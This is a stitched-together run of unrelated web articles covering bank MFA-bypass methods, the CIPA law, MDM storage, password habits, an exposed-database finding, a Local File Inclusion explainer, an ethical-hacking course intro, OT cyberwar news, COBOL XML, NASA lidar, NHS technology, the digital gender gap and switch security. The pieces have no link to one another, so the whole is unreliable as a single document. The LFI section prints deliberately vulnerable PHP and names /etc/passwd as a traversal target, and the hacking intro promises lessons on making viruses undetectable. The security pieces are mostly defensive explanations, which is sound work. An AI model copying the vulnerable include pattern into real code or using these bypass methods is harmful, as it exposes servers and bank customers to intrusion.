Some banks make provisions in case their users lose the device used for MFA, or don't have access to it for some reason. This is a way to bypass MFA using the bank's own policies. The most common method of verifying identity in this case is through security questions. Attackers use social engineering, which can be as simple as quickly looking at social media profiles, to find answers to common security questions and access accounts without MFA. Bots can therefore use credential stuffing to bypass MFA and instead answer security questions, either by brute force or using publicly available data.

Phishing

MFA bypass attacks often run in parallel with phishing attacks. Phishing is a means of tricking users into giving up sensitive information, such as passwords or information useful for passing security questions. Phishing can also be used to extract codes generated by MFA apps from account owners. Techniques include trying to convince an individual to visit a fake login page and input the MFA code. The threat actor might also email or phone an individual and impersonate their bank to ask for the MFA code. In this way, rather than bypassing MFA, attackers gain access to MFA codes maliciously.
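Several of the vectors above (credential stuffing, brute-forced security questions, guessed one-time codes) depend on high-velocity automation, which is why throttling is a common server-side counter. Below is a minimal sketch of a sliding-window rate limiter; the thresholds are hypothetical, and a production system would keep counters in shared storage such as Redis and combine throttling with device and behavioral signals rather than relying on rate limits alone.

```python
import time
from collections import defaultdict, deque

WINDOW_SECONDS = 60   # hypothetical sliding window
MAX_ATTEMPTS = 5      # hypothetical per-account threshold

attempts: dict[str, deque] = defaultdict(deque)

def allow_login_attempt(account_id: str, now: float | None = None) -> bool:
    """Return False once an account sees too many attempts in the window."""
    now = time.monotonic() if now is None else now
    window = attempts[account_id]
    # Drop attempts that fell out of the sliding window.
    while window and now - window[0] > WINDOW_SECONDS:
        window.popleft()
    if len(window) >= MAX_ATTEMPTS:
        return False  # throttle: likely automated guessing
    window.append(now)
    return True

# A bot hammering one account is cut off after MAX_ATTEMPTS.
for i in range(8):
    print(i + 1, allow_login_attempt("victim@example.com", now=float(i)))
```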
Man-in-the-middle attacks

In a man-in-the-middle (MITM) attack, the threat actor positions themselves between the bank and the customer (often by using malware) and intercepts the messages between them. They can use this to acquire an MFA code, for example by linking to a fake page asking for the MFA code.

SIM swapping

SIM swapping entails intercepting text messages sent to a user's phone number and having them sent to another handset. This is often done by calling up the user's SIM provider and impersonating the customer, using social engineering to pass security questions. The threat actor then convinces the operator to swap the phone number to a new SIM card in the attacker's possession. Once this is set up, the threat actor can use this phone number as the authentication factor to gain access to the user's account.

Why can't MFA completely stop bot attacks?

While we have presented a few ways fraudsters get around MFA defenses, it's true that MFA is stronger than passwords alone, and is still likely to slow down attacks, force a degree of human intervention, or yield fewer stolen accounts. However, because they can run at such high volumes, bots don't need a very high success rate to be profitable. Banks are still at risk of having customer accounts stolen by bot attacks, even with MFA in place. In essence, adding an extra layer of defense has forced criminals to become even more sophisticated in the ongoing cat-and-mouse chase between security experts and their adversaries.
The Children's Internet Protection Act and Its Implications

The Children's Internet Protection Act, or CIPA for short, is a federal law passed in 2000 that addresses concerns about children's access to harmful, offensive, or obscene content while using the internet. As opposed to the Children's Online Privacy Protection Act (COPPA), the CIPA focuses on children's internet use and access in the context of libraries and schools. As such, the CIPA imposes certain requirements on schools and libraries that receive discounts for internal connections or internet access through the E-rate program, a federal government program that makes certain communications services and products more affordable for eligible schools and libraries. The federal government enforces compliance with the CIPA by linking it to the E-rate program, and it retains the right to restrict or rescind funding if compliance is not met.

What are the requirements of the CIPA?

School districts and libraries that are subject to the CIPA are not eligible to receive the discounts offered through the E-rate program unless they first certify that they have developed an internet safety policy that includes various technology protection measures. These protection measures must block or filter internet access to pictures or images that contain obscenities, child pornography, or any other visual content that could be harmful to minors. Before adopting an internet safety policy, schools and libraries must first provide reasonable notice and hold at least one public meeting or hearing to address the proposal. That said, simply creating an internet safety policy is not enough to remain compliant with the CIPA. To maintain compliance, schools and libraries must ensure that their internet safety policies cover the following key functions:

- Internet filtering – internet filtering is a protection measure applied to all computers that will be accessed by students. This technology must block harmful internet content such as pornography or any other online content that may be deemed obscene or offensive.
- Internet monitoring – schools and libraries must monitor online activities to ensure that students are not engaging in harmful activities or behavior. This can include cyberbullying, the purchase of illegal substances, radicalization, or self-harm.
- Communications safety – this includes safe access to email, chat rooms, forums, and other forms of electronic communication.
- Unauthorized access – schools and libraries must provide protection and supervise students to prevent hacking and other forms of illegal online activity.
- Unauthorized disclosure – schools and libraries must provide protection against the illegal disclosure and use of the personal information of minors.
- Education – schools and libraries must provide educational information to minors concerning digital citizenship, such as cyberbullying awareness and how to interact appropriately on social media platforms and networks.

While schools and libraries that receive funding through the E-rate program are required to monitor the online activities of children, they are not required to track this information. Additionally, the CIPA does not apply to schools and libraries that receive E-rate program discounts for telecommunications purposes only.
Furthermore, an authorized person within a school or library may disable any internet blocking or filtering features for the purposes of research or other lawful activities they deem necessary. While the primary penalty that can be levied against schools and libraries found to be in non-compliance with the CIPA is the loss of funding, there are serious legal consequences that can result from providing false information or certifications to the federal government in any context.

While the internet has changed tremendously in the two decades since the CIPA was passed, the need to restrict what children can access online remains a concern of many parents, educators, and policymakers alike. To this end, the CIPA was amended in 2011 to cover social media websites and other online entities that either did not exist or were far less prominent in 2000 than they were in 2011 and continue to be today. What's more, the nature of harmful online activities such as cyberbullying has also changed with the rise of such sites. Despite all of this, the CIPA remains a legislative measure that protects children when they use the internet at the library or in school.
MDM Storage is created automatically when the server starts for the first time, and the structures for the storage are generated based on the defined model. The MDM Storage structure is transparent to users, while the implementation details of the structure are completely hidden. MDM storage includes a repository of cleansed, matched, and mastered data consisting of the following:

- The current data repository, which stores the instance records, or source records, from the different source systems. Storing data from the source systems has a critical purpose and provides many benefits. All records from the source systems are stored in their cleansed form, which allows systems to retrieve cleansed versions of their own records, and comparison against existing data is performed when receiving updates. This makes it possible to efficiently handle updates in MDM and cross-system distribution of source records.
- The Matching Key tables for all matched entities. These tables enable incremental matching, as well as identification of records when used as a service.
- Other technical tables.
- The historical data repository, which stores previous versions of both instance and master data. History contains data in a defined scope (specified entities, specified columns) and at a defined frequency (all changes vs. changes triggered by specified columns). Data is stored as BLOBs.

The MDM storage relies on a database and is platform-independent. All databases commonly found in the enterprise are supported as long as a JDBC driver is available for them. However, some databases allow for performance optimization techniques, so selecting one of those technologies for the MDM storage is recommended. The MDM storage tables should not be accessed directly. Instead, users should interact with the MDM repositories only through the online or batch interfaces. The use of logical transactions is another reason to rely only on the standard interfaces when accessing the MDM repositories.
The 6 Bad Habits Hackers Love

If you want to protect your data and accounts, you really have to think like the enemy…

There's no doubt about it: hacking is on the increase. According to Symantec's annual Internet Security Threat study, there were nearly a million new malware threats released every day in 2014 – from viruses and spyware to trojan horses and other malicious programs – while ransomware attacks, where access to a computer is restricted by hackers until a fee is paid, increased by 113 percent. And it costs us all money: McKinsey & Company estimates that cyber attacks will slow the pace of technology and business innovation over the next few years and cost the economy as much as $3 trillion annually.

So defeating the cyber criminals should be a priority for all of us. To do that, however, we have to get into the mind of the hacker – to analyse the security gaps they're looking for. And understand that, in terms of passwords, they're desperately hoping we've picked up some bad habits. Such as…

- We've gone "short & simple"

They're easier to remember, perhaps, but in terms of data security, a short and simple password is also far easier to crack with what are called brute-force attacks – where all possible keys or passwords are tried until the correct one is found. The key is to build what is called 'entropy' by choosing passwords with more than eight characters and adding "special characters" (such as capital letters, symbols etc). Or better still, a truly random password – something that, of course, Dashlane can help you with (a minimal sketch of generating one appears at the end of this article).

- We let our fingers do the walking

A recent investigation of 15 million accounts by hosting platform WP Engine revealed an odd habit: while many people had seemingly random passwords (such as "qaz2ws" or "adgjmptw"), they'd chosen them by typing simple patterns on their keyboards. But beware: password crackers such as Passpat use keyboard layouts and clever algorithms to measure the likelihood that a password is made from a keyboard pattern.

- We've left clues everywhere

Being sentimental old fools, we're very likely to create passwords from details of our own lives – such as our birthdates, pets, mother's maiden name, favorite football team and so on. However, this leaves us vulnerable to what's called social engineering, since many of these details are also available on social media (e.g. Facebook). This makes it simple for hackers to sift through these biographical clues, work out the 'base phrase' you've built your password on, and then gain access via what is called a dictionary attack. Only random words – or, better still, randomly generated alphanumeric sequences – are truly safe enough.

- We think we've been clever

Many of us attempt to build entropy by choosing a simple phrase – and then complicating it by using a combination of upper and lower case letters or tran5p05ing numb3r5 f0r l3tt3r5. But analysts found that even supposedly sophisticated passwords used obvious base phrases such as "password" or "qwerty" as their base. Which is all hackers need. Purpose-built password-breaking software such as HashCat is capable of taking 300,000 guesses at your password a second – by taking common base phrases like these and trying obvious variations and permutations.

- We happily use public WiFi

Jumping on the free WiFi connection at your local coffee shop, at the airport or even in your building seems innocuous – but it can leave you vulnerable to a method of hacking known as a man-in-the-middle attack.
In simple terms, this is a situation where a malicious eavesdropper (the "man in the middle") is able to read (or write) data being transmitted between you and the website you're browsing – meaning your data, emails and keystrokes could be intercepted without you knowing. Eliminate the risk by avoiding Wi-Fi connections that aren't yours and deleting these networks from your devices – but also make sure your own Wi-Fi connection is secured with a unique, private password.

- We've never deleted our old login emails

On average, we each now possess more than eighty different password-protected accounts – everything from social networking to home deliveries. So it's understandable that many of these login details will still be stored on your main email account in the form of the signup emails you were sent when you joined. But what happens if that email is compromised? For the hacker, your email is a goldmine. Services like Unroll.me will quickly identify unwanted subscriptions and unsubscribe you from dormant accounts.
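As a companion to the advice in the first point, here is a minimal Python sketch of generating a truly random password with the standard library's secrets module. The length and character set are illustrative choices, not recommendations from the original article.

    # Minimal sketch: generate a random password using Python's secrets module.
    # The 16-character length and the character set are illustrative assumptions.
    import secrets
    import string

    def random_password(length=16):
        alphabet = string.ascii_letters + string.digits + string.punctuation
        return "".join(secrets.choice(alphabet) for _ in range(length))

    print(random_password())   # different on every run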
Database Port Exposed to the Internet

Category: SECURITY_MISCONFIGURATION
Base Score: 3.0

A database service is exposed to the internet. Attackers often gain access to databases through credential attacks, by obtaining passwords leaked in data breaches and by password spraying weak passwords. This access allows attackers to steal or ransom off data contained within the database. In some cases, database access can lead to host compromise as well.
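One quick way to check whether a database port answers from the outside is a simple TCP connection test run from an external host. The Python sketch below is a minimal illustration; the address (a TEST-NET placeholder) and port list are assumptions, and a real assessment would use a proper scanner and only target systems you are authorized to test.

    # Minimal sketch: test whether common database ports accept TCP connections.
    # The host and port list are illustrative placeholders.
    import socket

    HOST = "203.0.113.10"
    DB_PORTS = {3306: "MySQL", 5432: "PostgreSQL", 1433: "SQL Server", 27017: "MongoDB"}

    for port, name in DB_PORTS.items():
        try:
            with socket.create_connection((HOST, port), timeout=3):
                print(f"{name} port {port} is OPEN from this network")
        except OSError:
            print(f"{name} port {port} is closed or filtered")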
An attacker can use Local File Inclusion (LFI) to trick the web application into exposing or running files on the web server. An LFI attack may lead to information disclosure, remote code execution, or even Cross-site Scripting (XSS). Typically, LFI occurs when an application uses the path to a file as input. If the application treats this input as trusted, a local file may be used in the include statement.

Local File Inclusion is very similar to Remote File Inclusion (RFI). However, an attacker using LFI may only include local files (not remote files, as in the case of RFI).

The following is an example of PHP code that is vulnerable to LFI:

    /**
     * Get the filename from a GET input
     * Example - http://example.com/?file=filename.php
     */
    $file = $_GET['file'];

    /**
     * Unsafely include the file
     * Example - filename.php
     */
    include('directory/' . $file);

In the above example, an attacker could craft a request whose file parameter points at a script they control, such as a web shell that the attacker managed to upload to the web server. The uploaded file would then be included and executed as the user that runs the web application, allowing the attacker to run any server-side malicious code they want.

This is a worst-case scenario. An attacker does not always have the ability to upload a malicious file to the application. Even if they did, there is no guarantee that the application will save the file on the same server where the LFI vulnerability exists. Even then, the attacker would still need to know the disk path to the uploaded file.

Even without the ability to upload and execute code, a Local File Inclusion vulnerability can be dangerous. An attacker can still perform a Directory Traversal / Path Traversal attack using an LFI vulnerability, for example by supplying a file parameter along the lines of ../../../../etc/passwd. In this way, an attacker can get the contents of the /etc/passwd file, which contains a list of users on the server. Similarly, an attacker may leverage the Directory Traversal vulnerability to access log files (for example, Apache access.log or error.log), source code, and other sensitive information. This information may then be used to advance an attack.

Finding and Preventing Local File Inclusion (LFI) Vulnerabilities

Fortunately, it's easy to test if your website or web application is vulnerable to LFI and other vulnerabilities by running an automated web scan using the Acunetix vulnerability scanner, which includes a specialized LFI scanner module. Request a demo and find out more about running LFI scans against your website or web application.

Frequently asked questions

LFI is a web vulnerability caused by mistakes made by a programmer of a website or web application. If an LFI vulnerability exists, an attacker can include malicious files that are later run by the website or web application.

Luckily, LFI is not a very common vulnerability. According to the latest Acunetix Web Application Vulnerability Report, it is present on average in 1% of web applications.

LFI can be dangerous, especially if combined with other vulnerabilities – for example, if the attacker is able to upload malicious files to the server. Even if the attacker cannot upload files, they can use the LFI vulnerability together with a directory traversal vulnerability to access sensitive information.

The most efficient way to detect LFI is by using an automated vulnerability scanner.
You can of course detect such vulnerabilities through manual penetration testing, but that takes far more time and resources.

To avoid LFI and many other vulnerabilities, never trust user input. If you need to include local files in your website or web application code, use a whitelist of allowed file names and locations, as sketched below. Make sure that none of these files can be replaced by an attacker using file upload functions.
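To make the whitelist advice concrete, here is a minimal sketch of the idea. The original article's examples are in PHP; this translation into Python, and the page names in it, are illustrative assumptions. The point is that user input only selects from a fixed map of known files and is never used to build a filesystem path.

    # Minimal sketch of whitelist-based file inclusion (names are illustrative).
    ALLOWED_PAGES = {
        "home": "pages/home.html",
        "about": "pages/about.html",
    }

    def render_page(page_param):
        """Look the requested page up in a fixed whitelist; never build paths from input."""
        path = ALLOWED_PAGES.get(page_param)
        if path is None:
            raise ValueError("Unknown page requested")
        with open(path, encoding="utf-8") as f:
            return f.read()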
First of all, I will try to explain what hacking really is…

WHAT IS HACKING?

Everyone here thinks that hacking is just stealing data and information illegally, but this perception is absolutely wrong. Below is the definition from Wikipedia, which clearly presents hacking as a negative thing:

"Hacking is unauthorized use of computer and network resources. (The term 'hacker' originally meant a very gifted programmer. In recent years though, with easier access to multiple systems, it now has negative implications.)"

But hacking is not always unauthorized. Hacking also includes exploring the things that are hidden from general usage; exploring what is hidden from the general user is also hacking.

My own definition of hacking: "Hacking is the art of exploring the hidden things that are kept from general usage, finding loopholes in security, and using them to benefit others."

WHO ARE HACKERS?

Everybody thinks that hackers are the criminals of the virtual (i.e. digital) world, but this thought is also wrong. Hackers are not always criminals, and there is no doubt that hackers are extremely talented people in the field of computers. I want to categorize hackers into three categories:

1. Crackers, or black hat hackers, or simply criminals: they are called criminals because they have the mindset of causing harm to security, and they steal very useful data and use it in wrong ways. Phishers, who steal account information, credit card numbers and money over the net, also come into this category.

2. Ethical hackers: ethical hacking means you think like a hacker – first you hack the systems and find the loopholes, then you try to correct those loopholes. These hackers protect the cyberworld from every possible threat and fix security holes before they can be exploited. These people are also called the "gurus" of computer security.

3. Simply pranksters: hackers who just hack for fun and play pranks on their friends.

INTRODUCTION TO SIMPLE TERMS RELATED TO HACKING

Threat – an action or event that might compromise security. A threat is a potential violation of security.

Vulnerability – the existence of a weakness, design flaw, or implementation error that can lead to an unexpected, undesirable event compromising the security of the system.

Exploit – a defined way to breach the security of a system through a vulnerability, i.e. using the vulnerability to damage the database or system.

Attack – an assault on system security that derives from an intelligent threat. An attack is any action that violates security.

Target of Evaluation – an IT system, product, or component that is identified/subjected as requiring security evaluation.

Security – a state of well-being of information and infrastructures in which the possibility of successful yet undetected theft, tampering, and disruption of information and services is kept low or tolerable. Security rests on confidentiality, authenticity, integrity, and availability:

- Confidentiality – the concealment of information or resources.
- Authenticity – the identification and assurance of the origin of information.
- Integrity – the trustworthiness of data or resources in terms of preventing improper and unauthorized changes.
- Availability – the ability to use the information or resource desired.

INTRODUCTION TO TOPICS THAT WE COVER IN THESE CLASSES
- Introduction to ethical hacking
- Hacking systems and OSes
- Trojans and backdoors
- Sniffers and DDoS (denial of service)
- Social engineering
- Hacking websites
- Hacking web applications and software
- Password hacking and cracking
- Phishing and fake pages
- SQL injection
- Hacking wireless (Wi-Fi)
- Viruses and worms
- Creating viruses and trojans and making them undetectable
- Exploit writing and the source code of very famous viruses
- Hacking web servers
- … and much more – the list is endless!

I think you will all like this and want to see more. I will post material regularly. This topic deserves comments and questions, so don't hesitate to ask your queries – I am here to reply to them all. Have fun and keep learning… as hacking is the art of mastering computers!
When describing the war in Ukraine recently, NPR's cybersecurity correspondent, Jenna McLaughlin, stated this: "It's now been 18 months of fighting. The focus has rightfully been on dead and wounded, but there's still real concern about how sophisticated cyberattacks paired with things like missiles and drones can inflict real damage. That's especially true with the power grid, an increasing concern as Ukraine prepares for another harsh winter. While some Ukrainians are fighting on the frontlines, others are using their digital skills to volunteer. And that includes career cybercriminals."

Russia, Ukraine, and OT Cyberattacks

What this ongoing conflict has taught us is that cybersecurity has become another battlefront, and some of the prime targets are critical infrastructure operators. Even before the official start of the war, Russia had been poking hard at Ukraine for years via cyberattacks on the country's critical infrastructure. But when the world's foremost cybersecurity experts stepped up to assist Ukraine – both to understand what happened during those incidents and to lend assistance in preventing new ones – Russia appears to have decided to test new ways to infiltrate OT. In fact, Mandiant just uncovered OT attacks that the Russian group Sandworm executed against Ukraine in October of last year. According to Security Week's reporting, Sandworm compromised an end-of-life MicroSCADA control system and issued commands through it, leading to disruptions that included a power outage. Researchers studying the case note that this type of methodology represents rising sophistication in OT cybercrime capabilities, a trend that is only likely to expand in 2024.

Google Cloud's new global Cybersecurity Forecast raises concerns over nation-state actors. In addition to interest in the United States' 2024 election, the forecast warns that cyberattackers may employ tactics such as wiper malware, sleeper botnets, and zero-day exploits to mount ambushes. But one emerging technology that could really fuel activity is generative AI. While Google Cloud predicts that generative AI will play a larger role for threat actors, it may also be a useful tool in defending against attacks.

Israel, Hamas, and Cybersecurity

Unfortunately, we now have another war where we could possibly see all or some of this play out. The world has now witnessed more than a month of fighting between Israel and Hamas. In this period, security teams have recorded an increase in cyberattacks against Israeli businesses, government agencies, and energy and telecommunications organizations. Politico also reports that hacking campaigns led by groups potentially connected to Iran and Russia attempted, before the October 7 strike by Hamas, to impact websites, the Israeli electric grid, and a missile defense system.

Although cyber warfare on the scale seen in the Russia-Ukraine conflict has yet to unfold between Israel and Hamas, the worry is certainly there. And with advanced methods available and risk to OT networks, the call to action to implement strong cybersecurity measures has never been louder. Therefore, large-scale efforts such as the NSA's guidance to enhance OT and OSS security, as well as private sector products designed specifically to protect OT and IT environments like those offered by DYNICS, are more important than ever.
Sources:

- "An inside look at Ukraine's cyber war with Russia" – Jenna McLaughlin, NPR. https://www.npr.org/2023/09/04/1197548380/an-inside-look-at-ukraines-cyber-war-with-russia
- "Russian Hackers Used OT Attack to Disrupt Power in Ukraine Amid Mass Missile Strikes" – Ryan Naraine, Security Week. https://www.securityweek.com/russian-hackers-ot-attack-disrupted-power-in-ukraine-amid-mass-missile-strikes/
- "Google Cloud's Cybersecurity Trends to Watch in 2024 Include Generative AI-Based Attacks" – Megan Crouse, TechRepublic. https://www.techrepublic.com/article/state-of-cybersecurity-2024/
- "The Hamas-Israeli war is also being fought in cyberspace" – David Strom, SiliconAngle. https://siliconangle.com/2023/10/12/hamas-israeli-war-also-fought-cyberspace/
- "How hackers piled onto the Israeli-Hamas conflict" – Antoaneta Roussi & Maggie Miller, Politico. https://www.politico.eu/article/israel-hamas-war-hackers-cyberattacks/
- "NSA and U.S. Agencies Issue Best Practices for Open Source Software in Operational Technology Environments" – National Security Agency/Central Security Service, press release.
This COBOL program illustrates how several similar XML documents are generated from a single COBOL data item. It also illustrates how the content of several similar XML documents may be converted into COBOL data format and stored in a COBOL data item.

Before any other XML statement may be executed, the XML INITIALIZE statement must be successfully executed. Since it is possible for XML INITIALIZE to fail, the return status must be checked before continuing.

Data is exported from the data item Data-Table to several XML documents with the filenames table1.xml, table2.xml, table3.xml, and table4.xml using the XML EXPORT FILE statement. All four combinations of the XML ENABLE ATTRIBUTES, XML DISABLE ATTRIBUTES, XML ENABLE ALL-OCCURRENCES, and XML DISABLE ALL-OCCURRENCES statements are used to alter the content of the generated XML documents.

Next, the content of these four XML documents (plus two additional "pre-created" XML documents, table5.xml and table6.xml) is imported and placed in the same data item using the XML IMPORT FILE statement. This example does not use a schema file to validate the input, because the array is fixed size and not all of the XML documents that will be input contain all of the occurrences of the array. These XML documents and their content are described in Execution results for example 4.

Finally, the XML interface is terminated with the XML TERMINATE statement. If any of the statements terminate unsuccessfully, the XML GET STATUS-TEXT statement is called.
Engineers at NASA's Goddard Space Flight Center are helping NASA improve its lidar technology to assist its scientists and explorers with remote sensing and surveying, mapping, 3D-image scanning, hazard detection and avoidance, and navigation. Goddard engineers and researchers are seeking to expand the usefulness of lidar applications in communication and navigation, planetary exploration, and space operations. Lidar technology, which is like sonar but uses light instead of sound, has increasingly helped NASA scientists and explorers with remote sensing and surveying. Cutting-edge innovations by Goddard researchers seek to refine lidars into smaller, lighter, more versatile tools for exploration.

Current lidar projects

One of the lidar projects, led by research engineer Mark Stephen, is developing a deployable, segmented telescope to capture the returning light signal using state-of-the-art flat-panel optics organized into foldable, origami-inspired panels. "Most people want really high performance, but they want it in a small, light and power-efficient package," Stephen said. "We're trying to find the best balance and cost matters." Stephen is also working with researchers at Brigham Young University; together, their team aims to provide future missions with the benefits of lidar technology at a lower price point and greater efficiency.

Lidar receivers depend on bulky lenses to capture light, and these large lenses are generally where lidar technology tends to get heavy. Flat optics utilize new types of nano-structured materials to manipulate individual photons. These meta-materials allow thin and lightweight optics to perform the same functions as the larger, more expensive lenses. The flat optics project is a three-year effort to improve lidar technology through a Radical Innovation Initiative grant within Goddard's Internal Research and Development (IRAD) program, and the project has been picked up by NASA's Earth Science Technology Office to fund further improvements.

Elsewhere, Goddard engineer Guangning Yang's research seeks to improve lidar by producing multiple wavelengths of light from a single beam. Most current lidars use multiple beams of a single wavelength to increase their accuracy. The Concurrent AI Spectrometry and Adaptive Lidar System (CASALS) is a lidar technology that can sweep a large area more efficiently and starts with one laser pulse. However, instead of splitting that pulse into the various directions it needs to travel, the technology changes the wavelength of the laser at very high speed. "We have improved the efficiency," Yang said, "and that will allow us to reduce the instrument's size dramatically." In addition to efficiency improvements, CASALS is a smaller instrument and could help provide higher-density mapping of Earth and other planets and moons. Both the flat optics and wavelength scanning projects can offer new opportunities in science and navigation and expand the possibilities of lidar technology.

A leader in engineering services

HCLTech is recognized as a Leader in Everest Group's ACES (Autonomous, Connected, Electric and Shared) Automotive Engineering Services PEAK Matrix Assessment 2023. The IT giant has an extensive portfolio of IP around telematics platforms and battery management systems, while also maintaining a portfolio that includes lidar technology.
"In the rapidly evolving automotive engineering services sector, HCLTech has emerged as a global Leader, distinguished by our multi-vertical expertise and extensive experience in traditional and digital engineering," said Hari Sadarahalli, Corporate Vice President, Engineering and R&D Services, HCLTech.

Supported by a solid ecosystem of partners, HCLTech's offerings are further backed by investments in developing solutions, establishing labs and Centers of Excellence, and a robust partnership network. This flexibility allows the organization to adapt to project requirements and commercials, access a wider talent pool, and apply strong domain knowledge in the ACES space. HCLTech is in a unique position to partner with enterprises that want to leverage digital technologies to transform their business.
Technology has never had more of an impact on people's lives than it does today. Whether it is shopping online, chatting with friends or collaborating with colleagues across the world, digital services have transformed the way people act, and the emergence of trends such as the Internet of Things will only continue to accelerate this.

One industry in particular that has seen a huge impact from digital is healthcare, where technology promises great advances in medical treatment and research. The industry is quickly moving to an age where self-diagnosis is just around the corner. The use of wearables can also take this to the next level, bridging the interface between patient and clinician. For example, there is an increasing number of technologies to help diabetics monitor blood glucose levels and, in some cases, provide automatic administration of a correct dose of insulin.

There are also wearable devices that can monitor heart rate, respiratory rate, heart rhythm, temperature, oxygen level and blood parameters, activity and sleep. They can alert citizens when they are about to be sick, as well as predict their risk and suggest interventions to avoid becoming ill in the future. The ability to gather biometric data on millions of people and mine this to identify predictors of disease will be a big advance in the next decade.

However, while technology is driving medical development, day-to-day healthcare services are being left behind and have yet to become digitalised. From managing the patient waiting room to organising staff rotas, the potential technology can provide is huge – yet it is being left untapped. Added to this, budget cuts have been at the forefront of many people's minds, causing cutbacks and disruption and not allowing organisations to run at their most efficient. It's time for healthcare organisations to adopt cost-effective, small changes to revitalise these healthcare services, bringing more flexibility and agility into the NHS. It will be these small changes that have the most impact on the healthcare industry.

Small changes that make a big impact

If you look back over the last 100 years, the biggest advances in medicine have often been the simplest of things – for example, the introduction of hand washing or the start of antiseptic surgery. This is also the case with technology, as it's the simple changes that can have the most impact: for example, booking GP appointments online instead of dealing with over-stretched receptionists, or a staff rota that allows employees to work more flexibly and in turn be more productive when working shifts. Technology needs to empower people at a basic level, which it currently isn't doing.

As well as this, a lot of healthcare organisations rely on paper to log patient data and organise staff rotas. Not only is this a security risk, it also means there is a lot of unnecessary admin that could be avoided. The most powerful computing capacity in most UK hospitals is usually a patient's phone. Shocking, isn't it? But the future looks more positive. In February 2016, it was predicted that the NHS could be paper-free by 2020, following a £4.2 billion investment to bring modern techniques into the health service. This move – helping staff become more tech savvy and allowing people with long-term conditions to send health data to doctors and nurses over the internet – is a simple change that could have a huge impact on patient care.
It would also ease pressure on emergency services and allow staff to build better relationships with patients.

In addition, there has been a lot of talk about Wi-Fi in hospitals. Up and down the country, access to free Wi-Fi has become the norm. Yet according to a Freedom of Information request, 64% of NHS Trusts do not offer Wi-Fi to patients. Instead, third-party suppliers provide limited access to the internet at a substantial cost, sometimes up to £10 a day. It is a missed opportunity to improve the patient experience, and the lack of Wi-Fi prevents doctors and nurses from using mobile devices, which would make their jobs easier and them far more efficient.

On top of all this, organising staff has never been easier. By empowering staff through intelligent digital schedules, allowing them to choose their own hours and more easily swap shifts between themselves, healthcare organisations can create a more productive and engaged workforce, reducing staff turnover and decreasing agency costs. For the NHS, this means agency spend would fall drastically, saving millions of pounds a year, as it would be using the resources it already has more effectively. It's not the number of hours that is the problem; it's the flexibility that's missing.

While there is no quick fix, it's time for the NHS to start making small changes with technology adoption. Whether it's mobile technology, the implementation of Wi-Fi or digital staff rotas, it is these digital services that can help make the patient experience better. Technology is all about empowering staff and patients, and it's time for the NHS to step up in today's digital age.

Sourced by Chris McCullough, co-founder and CEO at RotaGeek
The global gender gap in digital adoption excludes women from opportunities to learn, to work, and to be financially independent. Many of the causes of this gap are socio-economic: women are more likely to lack the financial means and the education to use digital services. But recent research suggests another factor is at play – the abuse and harassment that so many women and girls suffer online. Fixing this is yet another reason to improve the gender diversity of the technology industry itself.

According to research by the GSMA, the association of mobile network operators, access to the mobile internet allows women to feel safer, more connected and more autonomous, as well as developing their education and economic independence. And it has become all the more important during the pandemic, according to Claire Sibthorpe, the GSMA's head of connected women, connected society and assistive tech. "It's even more of a lifeline now, if you think about things like having to educate your families when schools are being closed, getting access to information about the pandemic, getting access to alternative income sources," she says. "So it's even more critical for women who often have these responsibilities on education, health and their families." This makes identifying the reasons why women are less likely to use digital services all the more urgent, Sibthorpe says.

What causes the digital gender gap?

According to Pew Research, globally men are 3.5% more likely to own a mobile phone than women, and 5.5% more likely to own a smartphone. In emerging economies, Pew's figures rise to 7% and 7.8% respectively, though the GSMA estimates the smartphone gender gap could be as high as 20% in low and middle-income countries. The GSMA says that, among mobile owners, women use a much smaller range of services and are 20% less likely to use the mobile internet.

There are many socio-economic reasons for this gap. In the majority of middle and lower-income countries, the top two barriers to women's adoption are affordability – particularly handset affordability – and lack of digital education and skills. "When socio-economic factors prevent access to all, women are particularly disadvantaged," says Dina Davaki, a researcher at the London School of Economics. "Because they are over-represented in poverty, and because they're under-represented in digital literacy."

But a recent study examining fintech adoption by the Bank for International Settlements suggests there might be more at play. The study found a gender disparity in the adoption of fintech services of around 8-9%. Even when controlling for wealth, marital and relationship status, financial confidence and literacy, or price sensitivity, there is still a significant gap between men and women. Some academics have theorised that this may be related to issues of privacy: if women have more experiences of privacy infringement both online and offline, they may be more hesitant to engage with new technologies. Research from Towson University in 2014 of millennial college students found that women were significantly more likely to report being "very concerned" about apps gathering their data.

But concerns around online safety go beyond matters of data privacy. For many women, digital platforms act as an extension of real-life threats. The GSMA's most recent report on the digital gender gap in mobile internet use found that the most common barriers to adoption – handset cost and a lack of knowledge about getting online – are more important to men than women.
But matters relating to safety, such as harmful online content and information security, are more important to women. In Latin America, a quarter of women see harmful content as a leading barrier to mobile internet use, and almost a third are worried about the security of their information. "So on the one hand women report that having a mobile really improves their safety," says Sibthorpe. "But at the same time, there are concerns about being harassed. These are not concerns that are mobile or online specifically, they're the same concerns they face in the offline world; they're also being translated into online."

This starts early: a recent Plan International study of 14,000 girls aged 15-25 from 22 countries found that 58% had been harassed or abused online. The report found that the harassment was similar across every continent, not just in Europe and North America. And it continues well into adulthood. "So many women professionals have had to leave their jobs because of cyberbullying," says Davaki. "It is a huge problem and it's just another aspect of violence against women."

Improving safety for women online

So what can be done? The GSMA has a few suggestions for developers and app operators to address these concerns, such as providing education and training in how to use the internet safely, responding to threats, and making privacy and safety tools easy to navigate. It also encourages them to include safety measures, such as emergency contact alerts and call-blocking services, and to make it easier for users to report abuse.

A persistent problem, says Louise Brett, head of fintech at Deloitte, is that the designers of new devices, apps and platforms don't anticipate women's concerns. "It can be designed by men for men, which is quite a big problem," she says. "If you're not designing for women, or potentially even designing against them, then even if you want to increase equality, you could accidentally do the opposite." This can create a vicious cycle, Davaki says, where women don't feel engaged by tech, so they are less likely to go into tech careers and work to improve the design. And so the pattern endures. "Stereotypes can lead to technophobia or techno-enthusiasm," says Davaki. "Techno-enthusiasm and inclusion in the digital world can be tremendously enhanced by changing the content in a way that would reflect all genders."
Switches are fantastic devices, allowing you to create VLANs and trunks and offering fast, relatively private communication. However, the basic nature of switch operation, along with the advent of trunk links, VLAN tags and some backwards-compatibility features, created extra security risks that were not anticipated when the technology emerged. In this course, Securing the Switch for Cisco CCNA 200-125/100-105, you will start off by learning about frame double-tagging. Next, you'll move on to the native VLAN security issues and DTP. You'll wrap up the course with a demonstration of creating a secure base configuration for a switch. By the end of this course, you'll know how to put a secure base configuration on a switch, mitigating many layer 2 attacks against Ethernet.
